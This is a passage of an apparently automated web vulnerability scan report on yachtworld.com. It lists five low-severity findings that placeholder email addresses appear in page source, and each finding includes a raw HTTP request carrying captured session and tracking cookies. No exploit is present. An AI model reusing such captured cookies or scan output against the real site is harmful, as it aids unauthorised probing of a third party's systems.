savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:06 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:07:13 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

       <title>B
...[SNIP]...
string represents an atom (basically a series of
       non-special characters.) */
   var atom=validChars + '+'
   /* The following string represents one word in the typical username.
       For example, in john.doe@somewhere.com, john and doe are words.
       Basically, a word is either an atom or quoted string. */
   var word="(" + atom + "|" + quotedUser + ")"
   // The following pattern describes the structure of the user
   var
...[SNIP]...
<i>youremail@boats.com</i>
...[SNIP]...

15.30. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Ohio/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Ohio/1

Issue detail

The following email addresses were disclosed in the response:

john.doe@somewhere.com
youremail@boats.com

Request

GET /boats/category/type/builder/model/United+States/Ohio/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:07 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:07:14 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

       <title>B
...[SNIP]...
string represents an atom (basically a series of
       non-special characters.) */
   var atom=validChars + '+'
   /* The following string represents one word in the typical username.
       For example, in john.doe@somewhere.com, john and doe are words.
       Basically, a word is either an atom or quoted string. */
   var word="(" + atom + "|" + quotedUser + ")"
   // The following pattern describes the structure of the user
   var
...[SNIP]...
<i>youremail@boats.com</i>
...[SNIP]...

15.31. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Rhode+Island/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Rhode+Island/1

Issue detail

The following email addresses were disclosed in the response:

john.doe@somewhere.com
youremail@boats.com

Request

GET /boats/category/type/builder/model/United+States/Rhode+Island/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:09 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:07:16 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

       <title>B
...[SNIP]...
string represents an atom (basically a series of
       non-special characters.) */
   var atom=validChars + '+'
   /* The following string represents one word in the typical username.
       For example, in john.doe@somewhere.com, john and doe are words.
       Basically, a word is either an atom or quoted string. */
   var word="(" + atom + "|" + quotedUser + ")"
   // The following pattern describes the structure of the user
   var
...[SNIP]...
<i>youremail@boats.com</i>
...[SNIP]...

15.32. http://www.yachtworld.com/boats/category/type/builder/model/United+States/South+Carolina/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/South+Carolina/1

Issue detail

The following email addresses were disclosed in the response:

john.doe@somewhere.com
youremail@boats.com

Request

GET /boats/category/type/builder/model/United+States/South+Carolina/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:15 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:07:22 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

       <title>B
...[SNIP]...
string represents an atom (basically a series of
       non-special characters.) */
   var atom=validChars + '+'
   /* The following string represents one word in the typical username.
       For example, in john.doe@somewhere.com, john and doe are words.
       Basically, a word is either an atom or quoted string. */
   var word="(" + atom + "|" + quotedUser + ")"
   // The following pattern describes the structure of the user
   var
...[SNIP]...
<i>youremail@boats.com</i>
...[SNIP]...

15.33. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Texas/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Texas/1

Issue detail

The following email addresses were disclosed in the response:

john.doe@somewhere.com
youremail@boats.com

Request

GET /boats/category/type/builder/model/United+States/Texas/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:06 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:07:12 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

       <title>B
...[SNIP]...
string represents an atom (basically a series of
       non-special characters.) */
   var atom=validChars + '+'
   /* The following string represents one word in the typical username.
       For example, in john.doe@somewhere.com, john and doe are words.
       Basically, a word is either an atom or quoted string. */
   var word="(" + atom + "|" + quotedUser + ")"
   // The following pattern describes the structure of the user
   var
...[SNIP]...
<i>youremail@boats.com</i>
...[SNIP]...

15.34. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Virginia/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Virginia/1

Issue detail

The following email addresses were disclosed in the response:

john.doe@somewhere.com
youremail@boats.com

Request

GET /boats/category/type/builder/model/United+States/Virginia/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; 